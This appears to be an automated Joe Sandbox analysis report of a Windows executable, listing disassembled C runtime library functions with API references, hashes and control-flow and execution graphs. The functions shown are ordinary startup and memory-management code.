                                                                                • Part of subcall function 00981555: __decode_pointer.LIBCMT ref: 009815AF
                                                                                • Part of subcall function 00981555: __decode_pointer.LIBCMT ref: 009815D9
                                                                                • Part of subcall function 00981555: __decode_pointer.LIBCMT ref: 009815EF
                                                                                • Part of subcall function 00981555: __decode_pointer.LIBCMT ref: 009815FC
                                                                                • Part of subcall function 00981555: __initterm.LIBCMT ref: 0098162B
                                                                                • Part of subcall function 00981555: __initterm.LIBCMT ref: 0098163B
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                              • String ID:
                                                                              • API String ID: 1597249276-0
                                                                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                              • Instruction ID: 7af39f89b0c9ceede3bbaa94c1ab6adb6d482c13ec41952658a8d18fc0801cdf
                                                                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                              • Instruction Fuzzy Hash: 7CB0123258030C33DB203586EC03F463F0D87C0BA0F250020FA0D1D2F1AAA3B96281CA

                                                                              Non-executed Functions

                                                                              Function 009810CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00981346
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0098135B
                                                                              • UnhandledExceptionFilter.KERNEL32(0098816C), ref: 00981366
                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00981382
                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00981389
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                              • String ID:
                                                                              • API String ID: 2579439406-0
                                                                              • Opcode ID: d96304e9515183379d6163bca78d840276d6207f86345d89af2957ea658bb4e4
                                                                              • Instruction ID: 721327051c74e6acca7fa3dd9ff6053b095f4bcb06f58a4c34651583dab6558c
                                                                              • Opcode Fuzzy Hash: d96304e9515183379d6163bca78d840276d6207f86345d89af2957ea658bb4e4
                                                                              • Instruction Fuzzy Hash: DF21DDB4829304DFE710EF28ED446593BB4BB48342F50401BE508CBBB1EBB85989EF56
                                                                              Function 009821E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00989458,0000000C,00982320,00000000,00000000,?,0098174F,00000003,?,?,?,?,?,?,009810F6), ref: 009821F7
                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00982202
                                                                                • Part of subcall function 009813E1: Sleep.KERNEL32(000003E8,00000000,?,00982148,KERNEL32.DLL,?,00982194,?,0098174F,00000003), ref: 009813ED
                                                                                • Part of subcall function 009813E1: GetModuleHandleW.KERNEL32(?,?,00982148,KERNEL32.DLL,?,00982194,?,0098174F,00000003,?,?,?,?,?,?,009810F6), ref: 009813F6
                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0098222B
                                                                              • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0098223B
                                                                              • __lock.LIBCMT ref: 0098225D
                                                                              • InterlockedIncrement.KERNEL32(0098A4D8), ref: 0098226A
                                                                              • __lock.LIBCMT ref: 0098227E
                                                                              • ___addlocaleref.LIBCMT ref: 0098229C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 1028249917-2843748187
                                                                              • Opcode ID: 960abbf4bbabadc74d46e88a9752f0c7213608071f3312e41f141c0ebc8528ca
                                                                              • Instruction ID: 000d6f0901d5f8cf194dbf094c4fcd37b748118c414cba69f45d898d37dd1b87
                                                                              • Opcode Fuzzy Hash: 960abbf4bbabadc74d46e88a9752f0c7213608071f3312e41f141c0ebc8528ca
                                                                              • Instruction Fuzzy Hash: D211EE70840700DFE720FF79D845B9BBBF0AF90310F20441AE4AAA33A0CB74AA41DB21
                                                                              Function 009840A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 170 9840a0-9840bb call 98264c call 982345 175 9840da-9840f2 call 982aa0 170->175 176 9840bd-9840c1 170->176 181 98412a-984136 call 98413b 175->181 182 9840f4-9840f6 175->182 176->175 178 9840c3 176->178 180 9840c6-9840c8 178->180 183 9840ca-9840d1 call 981411 180->183 184 9840d2-9840d9 call 982691 180->184 181->180 188 9840f8-984101 InterlockedDecrement 182->188 189 984112-984124 InterlockedIncrement 182->189 183->184 188->189 193 984103-984109 188->193 189->181 193->189 194 98410b-984111 call 9835ee 193->194 194->189
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 009840AC
                                                                                • Part of subcall function 00982345: __getptd_noexit.LIBCMT ref: 00982348
                                                                                • Part of subcall function 00982345: __amsg_exit.LIBCMT ref: 00982355
                                                                              • __amsg_exit.LIBCMT ref: 009840CC
                                                                              • __lock.LIBCMT ref: 009840DC
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 009840F9
                                                                              • InterlockedIncrement.KERNEL32(02462AF0), ref: 00984124
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 4271482742-0
                                                                              • Opcode ID: bf3268204b7b0855637b4f12f68842e00856eb71d4b56a17cf97a1e89b720539
                                                                              • Instruction ID: 18169120eb733247e68761d6434b3e85195efd74c461b2c9784b9ebac61f5699
                                                                              • Opcode Fuzzy Hash: bf3268204b7b0855637b4f12f68842e00856eb71d4b56a17cf97a1e89b720539
                                                                              • Instruction Fuzzy Hash: 8A01F532D09722DBDB25BF24980A75E73A4BF60710F144146F900A3791DB38AD81EFE6
                                                                              Function 009835EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 197 9835ee-9835ff call 98264c 200 983601-983608 197->200 201 983676-98367b call 982691 197->201 203 98360a-983622 call 982aa0 call 9845e4 200->203 204 98364d 200->204 214 98362d-98363d call 983644 203->214 215 983624-98362c call 984614 203->215 206 98364e-98365e HeapFree 204->206 206->201 208 983660-983675 call 982c72 GetLastError call 982c30 206->208 208->201 214->201 222 98363f-983642 214->222 215->214 222->206
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 0098360C
                                                                                • Part of subcall function 00982AA0: __mtinitlocknum.LIBCMT ref: 00982AB6
                                                                                • Part of subcall function 00982AA0: __amsg_exit.LIBCMT ref: 00982AC2
                                                                                • Part of subcall function 00982AA0: EnterCriticalSection.KERNEL32(?,?,?,00985600,00000004,00989628,0000000C,00983746,?,?,00000000,00000000,00000000,?,009822F7,00000001), ref: 00982ACA
                                                                              • ___sbh_find_block.LIBCMT ref: 00983617
                                                                              • ___sbh_free_block.LIBCMT ref: 00983626
                                                                              • HeapFree.KERNEL32(00000000,?,00989568,0000000C,00982A81,00000000,009894C8,0000000C,00982ABB,?,?,?,00985600,00000004,00989628,0000000C), ref: 00983656
                                                                              • GetLastError.KERNEL32(?,00985600,00000004,00989628,0000000C,00983746,?,?,00000000,00000000,00000000,?,009822F7,00000001,00000214), ref: 00983667
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 2714421763-0
                                                                              • Opcode ID: 0dd7c9fc7898bd7502b9c0371d1d3d99fc8e49db799c7b35ec1a70f654269683
                                                                              • Instruction ID: 0e6461bd760bcfac747a19f97346e5650cf0ac42afb642b4e8066d719e9b4fb4
                                                                              • Opcode Fuzzy Hash: 0dd7c9fc7898bd7502b9c0371d1d3d99fc8e49db799c7b35ec1a70f654269683
                                                                              • Instruction Fuzzy Hash: A401D631C08305BBDB207F759C07B5E36A8AF40B60F648149F441A63D1EF388640DB58
                                                                              Function 00983E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 223 983e04-983e1f call 98264c call 982345 228 983e21-983e25 223->228 229 983e43-983e6c call 982aa0 call 983dc6 call 983e6e 223->229 228->229 231 983e27-983e2c call 982345 228->231 237 983e2f-983e31 229->237 231->237 239 983e3b-983e42 call 982691 237->239 240 983e33-983e3a call 981411 237->240 240->239
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 00983E10
                                                                                • Part of subcall function 00982345: __getptd_noexit.LIBCMT ref: 00982348
                                                                                • Part of subcall function 00982345: __amsg_exit.LIBCMT ref: 00982355
                                                                              • __getptd.LIBCMT ref: 00983E27
                                                                              • __amsg_exit.LIBCMT ref: 00983E35
                                                                              • __lock.LIBCMT ref: 00983E45
                                                                              Memory Dump Source
                                                                              • Source File: 00000028.00000002.2673119260.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000028.00000002.2673036351.0000000000980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673237993.000000000098A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                              • Associated: 00000028.00000002.2673291727.000000000098C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_40_2_980000_NEiV2V.jbxd
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 3521780317-0
                                                                              • Opcode ID: 59fa89587b2035aa34c25438c07a45a1bdc7abdb9398ea05dd11828612c160c1
                                                                              • Instruction ID: f8e675c8685d81ee45529f5c122ea84edd5f279c1f0828796b3cadeddf062762
                                                                              • Opcode Fuzzy Hash: 59fa89587b2035aa34c25438c07a45a1bdc7abdb9398ea05dd11828612c160c1
                                                                              • Instruction Fuzzy Hash: F1F0BE329047008BEB20FB74840774D73A0AFD4F20F10854AF446A77E2DF789A02CB92

                                                                              Execution Graph

                                                                              Execution Coverage:5.9%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:1048
                                                                              Total number of Limit Nodes:28
                                                                              execution_graph 3920 b531b4 3921 b531c0 SetLastError 3920->3921 3922 b531c8 _doexit 3920->3922 3921->3922 3958 b51391 3959 b513cd 3958->3959 3960 b513a3 3958->3960 3960->3959 3962 b528da 3960->3962 3963 b528e6 _doexit 3962->3963 3968 b52345 3963->3968 3969 b522cc __getptd_noexit 66 API calls 3968->3969 3970 b5234d 3969->3970 3971 b5235a 3970->3971 3972 b51411 __amsg_exit 66 API calls 3970->3972 3973 b551fb 3971->3973 3972->3971 3974 b55221 3973->3974 3975 b5521a 3973->3975 3985 b52f92 3974->3985 3976 b51719 __NMSG_WRITE 66 API calls 3975->3976 3976->3974 3980 b5530a 4009 b51697 3980->4009 3981 b55232 ___convertcp 3981->3980 3983 b552ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3981->3983 3983->3980 3986 b520f9 __decode_pointer 6 API calls 3985->3986 3987 b52f9d 3986->3987 3987->3981 3988 b52f9f 3987->3988 3991 b52fab _doexit 3988->3991 3989 b53007 3992 b52fe8 3989->3992 3994 b53016 3989->3994 3990 b52fd2 3993 b522cc __getptd_noexit 66 API calls 3990->3993 3991->3989 3991->3990 3991->3992 3997 b52fce 3991->3997 3995 b520f9 __decode_pointer 6 API calls 3992->3995 3998 b52fd7 _siglookup 3993->3998 3996 b52c72 _strcpy_s 66 API calls 3994->3996 3995->3998 3999 b5301b 3996->3999 3997->3990 3997->3994 4001 b5307d 3998->4001 4002 b51697 _abort 66 API calls 3998->4002 4008 b52fe0 _doexit 3998->4008 4000 b52c0a _strcpy_s 6 API calls 3999->4000 4000->4008 4003 b52aa0 __lock 66 API calls 4001->4003 4004 b53088 4001->4004 4002->4001 4003->4004 4005 b520f0 _doexit 6 API calls 4004->4005 4006 b530bd 4004->4006 4005->4006 4012 b53113 4006->4012 4008->3981 4010 b51555 _doexit 66 API calls 4009->4010 4011 b516a8 4010->4011 4013 b53120 4012->4013 4014 b53119 4012->4014 4013->4008 4016 b529c6 LeaveCriticalSection 4014->4016 4016->4013 3923 b526b0 3924 b526dc 3923->3924 3925 b526e9 3923->3925 3926 b510cc ___convertcp 5 API calls 3924->3926 3927 b510cc ___convertcp 5 API calls 3925->3927 3926->3925 3933 b526f9 __except_handler4 __IsNonwritableInCurrentImage 3927->3933 3928 b5277c 3929 b52752 __except_handler4 3929->3928 3930 b5276c 3929->3930 3931 b510cc ___convertcp 5 API calls 3929->3931 3932 b510cc ___convertcp 5 API calls 3930->3932 3931->3930 3932->3928 3933->3928 3933->3929 3939 b551ca RtlUnwind 3933->3939 3935 b527cb __except_handler4 3936 b527ff 3935->3936 3937 b510cc ___convertcp 5 API calls 3935->3937 3938 b510cc ___convertcp 5 API calls 3936->3938 3937->3936 3938->3929 3939->3935 3940 b5543d 3941 b51411 __amsg_exit 66 API calls 3940->3941 3942 b55444 3941->3942 3943 b52d3f 3944 b53730 __calloc_crt 66 API calls 3943->3944 3945 b52d4b 3944->3945 3946 b5207e __encode_pointer 6 API calls 3945->3946 3947 b52d53 3946->3947 4036 b5235f 4038 b5236b _doexit 4036->4038 4037 b52383 4039 b52391 4037->4039 4042 b535ee ___free_lconv_num 66 API calls 4037->4042 4038->4037 4040 b5246d _doexit 4038->4040 4041 b535ee ___free_lconv_num 66 API calls 4038->4041 4043 b5239f 4039->4043 4044 b535ee ___free_lconv_num 66 API calls 4039->4044 4041->4037 4042->4039 4045 b523ad 4043->4045 4046 b535ee ___free_lconv_num 66 API calls 4043->4046 4044->4043 4047 b523bb 4045->4047 4049 b535ee ___free_lconv_num 66 API calls 4045->4049 4046->4045 4048 b523c9 4047->4048 4050 b535ee ___free_lconv_num 66 API calls 4047->4050 4051 b523d7 4048->4051 4052 b535ee ___free_lconv_num 66 API calls 4048->4052 4049->4047 4050->4048 4053 b535ee ___free_lconv_num 66 API calls 4051->4053 4055 b523e8 4051->4055 4052->4051 4053->4055 4054 b52aa0 __lock 66 API calls 4056 b523f0 4054->4056 4055->4054 4057 b52415 4056->4057 4058 b523fc InterlockedDecrement 4056->4058 4072 b52479 4057->4072 4058->4057 4059 b52407 4058->4059 4059->4057 4062 b535ee ___free_lconv_num 66 API calls 4059->4062 4062->4057 4063 b52aa0 __lock 66 API calls 4064 b52429 4063->4064 4065 b5245a 4064->4065 4075 b53d2d 4064->4075 4119 b52485 4065->4119 4069 b535ee ___free_lconv_num 66 API calls 4069->4040 4122 b529c6 LeaveCriticalSection 4072->4122 4074 b52422 4074->4063 4076 b5243e 4075->4076 4077 b53d3e InterlockedDecrement 4075->4077 4076->4065 4089 b53b55 4076->4089 4078 b53d56 4077->4078 4079 b53d53 InterlockedDecrement 4077->4079 4080 b53d60 InterlockedDecrement 4078->4080 4081 b53d63 4078->4081 4079->4078 4080->4081 4082 b53d70 4081->4082 4083 b53d6d InterlockedDecrement 4081->4083 4084 b53d7a InterlockedDecrement 4082->4084 4086 b53d7d 4082->4086 4083->4082 4084->4086 4085 b53d96 InterlockedDecrement 4085->4086 4086->4085 4087 b53da6 InterlockedDecrement 4086->4087 4088 b53db1 InterlockedDecrement 4086->4088 4087->4086 4088->4076 4090 b53bd9 4089->4090 4092 b53b6c 4089->4092 4091 b535ee ___free_lconv_num 66 API calls 4090->4091 4093 b53c26 4090->4093 4094 b53bfa 4091->4094 4092->4090 4099 b53ba0 4092->4099 4102 b535ee ___free_lconv_num 66 API calls 4092->4102 4117 b53c4d 4093->4117 4147 b55ae1 4093->4147 4096 b535ee ___free_lconv_num 66 API calls 4094->4096 4098 b53c0d 4096->4098 4104 b535ee ___free_lconv_num 66 API calls 4098->4104 4105 b535ee ___free_lconv_num 66 API calls 4099->4105 4118 b53bc1 4099->4118 4100 b535ee ___free_lconv_num 66 API calls 4106 b53bce 4100->4106 4101 b53c92 4107 b535ee ___free_lconv_num 66 API calls 4101->4107 4108 b53b95 4102->4108 4103 b535ee ___free_lconv_num 66 API calls 4103->4117 4109 b53c1b 4104->4109 4110 b53bb6 4105->4110 4112 b535ee ___free_lconv_num 66 API calls 4106->4112 4113 b53c98 4107->4113 4123 b55cbb 4108->4123 4115 b535ee ___free_lconv_num 66 API calls 4109->4115 4139 b55c76 4110->4139 4111 b535ee 66 API calls ___free_lconv_num 4111->4117 4112->4090 4113->4065 4115->4093 4117->4101 4117->4111 4118->4100 4235 b529c6 LeaveCriticalSection 4119->4235 4121 b52467 4121->4069 4122->4074 4124 b55cc8 4123->4124 4138 b55d45 4123->4138 4125 b55cd9 4124->4125 4126 b535ee ___free_lconv_num 66 API calls 4124->4126 4127 b55ceb 4125->4127 4128 b535ee ___free_lconv_num 66 API calls 4125->4128 4126->4125 4129 b535ee ___free_lconv_num 66 API calls 4127->4129 4131 b55cfd 4127->4131 4128->4127 4129->4131 4130 b55d0f 4133 b55d21 4130->4133 4134 b535ee ___free_lconv_num 66 API calls 4130->4134 4131->4130 4132 b535ee ___free_lconv_num 66 API calls 4131->4132 4132->4130 4135 b55d33 4133->4135 4136 b535ee ___free_lconv_num 66 API calls 4133->4136 4134->4133 4137 b535ee ___free_lconv_num 66 API calls 4135->4137 4135->4138 4136->4135 4137->4138 4138->4099 4140 b55c83 4139->4140 4141 b55cb7 4139->4141 4142 b55c93 4140->4142 4143 b535ee ___free_lconv_num 66 API calls 4140->4143 4141->4118 4144 b55ca5 4142->4144 4145 b535ee ___free_lconv_num 66 API calls 4142->4145 4143->4142 4144->4141 4146 b535ee ___free_lconv_num 66 API calls 4144->4146 4145->4144 4146->4141 4148 b53c46 4147->4148 4149 b55af2 4147->4149 4148->4103 4150 b535ee ___free_lconv_num 66 API calls 4149->4150 4151 b55afa 4150->4151 4152 b535ee ___free_lconv_num 66 API calls 4151->4152 4153 b55b02 4152->4153 4154 b535ee ___free_lconv_num 66 API calls 4153->4154 4155 b55b0a 4154->4155 4156 b535ee ___free_lconv_num 66 API calls 4155->4156 4157 b55b12 4156->4157 4158 b535ee ___free_lconv_num 66 API calls 4157->4158 4159 b55b1a 4158->4159 4160 b535ee ___free_lconv_num 66 API calls 4159->4160 4161 b55b22 4160->4161 4162 b535ee ___free_lconv_num 66 API calls 4161->4162 4163 b55b29 4162->4163 4164 b535ee ___free_lconv_num 66 API calls 4163->4164 4165 b55b31 4164->4165 4166 b535ee ___free_lconv_num 66 API calls 4165->4166 4167 b55b39 4166->4167 4168 b535ee ___free_lconv_num 66 API calls 4167->4168 4169 b55b41 4168->4169 4170 b535ee ___free_lconv_num 66 API calls 4169->4170 4171 b55b49 4170->4171 4172 b535ee ___free_lconv_num 66 API calls 4171->4172 4173 b55b51 4172->4173 4174 b535ee ___free_lconv_num 66 API calls 4173->4174 4175 b55b59 4174->4175 4176 b535ee ___free_lconv_num 66 API calls 4175->4176 4177 b55b61 4176->4177 4178 b535ee ___free_lconv_num 66 API calls 4177->4178 4179 b55b69 4178->4179 4180 b535ee ___free_lconv_num 66 API calls 4179->4180 4181 b55b71 4180->4181 4182 b535ee ___free_lconv_num 66 API calls 4181->4182 4183 b55b7c 4182->4183 4184 b535ee ___free_lconv_num 66 API calls 4183->4184 4185 b55b84 4184->4185 4186 b535ee ___free_lconv_num 66 API calls 4185->4186 4187 b55b8c 4186->4187 4188 b535ee ___free_lconv_num 66 API calls 4187->4188 4189 b55b94 4188->4189 4190 b535ee ___free_lconv_num 66 API calls 4189->4190 4191 b55b9c 4190->4191 4192 b535ee ___free_lconv_num 66 API calls 4191->4192 4193 b55ba4 4192->4193 4194 b535ee ___free_lconv_num 66 API calls 4193->4194 4195 b55bac 4194->4195 4196 b535ee ___free_lconv_num 66 API calls 4195->4196 4197 b55bb4 4196->4197 4198 b535ee ___free_lconv_num 66 API calls 4197->4198 4199 b55bbc 4198->4199 4200 b535ee ___free_lconv_num 66 API calls 4199->4200 4201 b55bc4 4200->4201 4202 b535ee ___free_lconv_num 66 API calls 4201->4202 4203 b55bcc 4202->4203 4204 b535ee ___free_lconv_num 66 API calls 4203->4204 4205 b55bd4 4204->4205 4206 b535ee ___free_lconv_num 66 API calls 4205->4206 4207 b55bdc 4206->4207 4208 b535ee ___free_lconv_num 66 API calls 4207->4208 4209 b55be4 4208->4209 4210 b535ee ___free_lconv_num 66 API calls 4209->4210 4211 b55bec 4210->4211 4212 b535ee ___free_lconv_num 66 API calls 4211->4212 4213 b55bf4 4212->4213 4214 b535ee ___free_lconv_num 66 API calls 4213->4214 4215 b55c02 4214->4215 4216 b535ee ___free_lconv_num 66 API calls 4215->4216 4217 b55c0d 4216->4217 4218 b535ee ___free_lconv_num 66 API calls 4217->4218 4219 b55c18 4218->4219 4220 b535ee ___free_lconv_num 66 API calls 4219->4220 4221 b55c23 4220->4221 4222 b535ee ___free_lconv_num 66 API calls 4221->4222 4223 b55c2e 4222->4223 4224 b535ee ___free_lconv_num 66 API calls 4223->4224 4225 b55c39 4224->4225 4226 b535ee ___free_lconv_num 66 API calls 4225->4226 4227 b55c44 4226->4227 4228 b535ee ___free_lconv_num 66 API calls 4227->4228 4229 b55c4f 4228->4229 4230 b535ee ___free_lconv_num 66 API calls 4229->4230 4231 b55c5a 4230->4231 4232 b535ee ___free_lconv_num 66 API calls 4231->4232 4233 b55c65 4232->4233 4234 b535ee ___free_lconv_num 66 API calls 4233->4234 4234->4148 4235->4121 4028 b528fe 4029 b52901 4028->4029 4030 b551fb _abort 68 API calls 4029->4030 4031 b5290d _doexit 4030->4031 3948 b55138 3949 b5514a 3948->3949 3951 b55158 @_EH4_CallFilterFunc@8 3948->3951 3950 b510cc ___convertcp 5 API calls 3949->3950 3950->3951 3232 b51104 3269 b5264c 3232->3269 3234 b51110 GetStartupInfoW 3236 b51133 3234->3236 3270 b5261b HeapCreate 3236->3270 3238 b51183 3272 b5248e GetModuleHandleW 3238->3272 3242 b51194 __RTC_Initialize 3306 b51dde 3242->3306 3243 b510db _fast_error_exit 66 API calls 3243->3242 3245 b511a2 3246 b511ae GetCommandLineW 3245->3246 3380 b51411 3245->3380 3321 b51d81 GetEnvironmentStringsW 3246->3321 3249 b511bd 3330 b51cd3 GetModuleFileNameW 3249->3330 3253 b51411 __amsg_exit 66 API calls 3255 b511d2 3253->3255 3336 b51aa4 3255->3336 3257 b511e3 3349 b514d0 3257->3349 3258 b51411 __amsg_exit 66 API calls 3258->3257 3260 b511ea 3261 b51411 __amsg_exit 66 API calls 3260->3261 3262 b511f5 __wwincmdln 3260->3262 3261->3262 3355 b51000 CoInitialize CreateMutexW 3262->3355 3264 b51216 3265 b51224 3264->3265 3369 b51681 3264->3369 3387 b516ad 3265->3387 3268 b51229 _doexit 3269->3234 3271 b51177 3270->3271 3271->3238 3372 b510db 3271->3372 3273 b524a2 3272->3273 3274 b524a9 3272->3274 3390 b513e1 3273->3390 3276 b52611 3274->3276 3277 b524b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3274->3277 3449 b521a8 3276->3449 3279 b524fc TlsAlloc 3277->3279 3282 b51189 3279->3282 3283 b5254a TlsSetValue 3279->3283 3282->3242 3282->3243 3283->3282 3284 b5255b 3283->3284 3394 b516cb 3284->3394 3289 b5207e __encode_pointer 6 API calls 3290 b5257b 3289->3290 3291 b5207e __encode_pointer 6 API calls 3290->3291 3292 b5258b 3291->3292 3293 b5207e __encode_pointer 6 API calls 3292->3293 3294 b5259b 3293->3294 3411 b52924 3294->3411 3301 b520f9 __decode_pointer 6 API calls 3302 b525ef 3301->3302 3302->3276 3303 b525f6 3302->3303 3431 b521e5 3303->3431 3305 b525fe GetCurrentThreadId 3305->3282 3776 b5264c 3306->3776 3308 b51dea GetStartupInfoA 3309 b53730 __calloc_crt 66 API calls 3308->3309 3316 b51e0b 3309->3316 3310 b52029 _doexit 3310->3245 3311 b51fa6 GetStdHandle 3317 b51f70 3311->3317 3312 b53730 __calloc_crt 66 API calls 3312->3316 3313 b5200b SetHandleCount 3313->3310 3314 b51fb8 GetFileType 3314->3317 3315 b51ef3 3315->3310 3315->3317 3318 b51f1c GetFileType 3315->3318 3320 b5317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3315->3320 3316->3310 3316->3312 3316->3315 3316->3317 3317->3310 3317->3311 3317->3313 3317->3314 3319 b5317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3317->3319 3318->3315 3319->3317 3320->3315 3322 b51d92 3321->3322 3324 b51d96 3321->3324 3322->3249 3323 b51da9 3325 b536eb __malloc_crt 66 API calls 3323->3325 3324->3323 3324->3324 3326 b51db7 3325->3326 3327 b51dbe FreeEnvironmentStringsW 3326->3327 3777 b537f0 3326->3777 3327->3249 3331 b51d08 _wparse_cmdline 3330->3331 3332 b511c7 3331->3332 3333 b51d45 3331->3333 3332->3253 3332->3255 3334 b536eb __malloc_crt 66 API calls 3333->3334 3335 b51d4b _wparse_cmdline 3334->3335 3335->3332 3337 b51abc _wcslen 3336->3337 3341 b511d8 3336->3341 3338 b53730 __calloc_crt 66 API calls 3337->3338 3344 b51ae0 _wcslen 3338->3344 3339 b51b45 3340 b535ee ___free_lconv_num 66 API calls 3339->3340 3340->3341 3341->3257 3341->3258 3342 b53730 __calloc_crt 66 API calls 3342->3344 3343 b51b6b 3345 b535ee ___free_lconv_num 66 API calls 3343->3345 3344->3339 3344->3341 3344->3342 3344->3343 3347 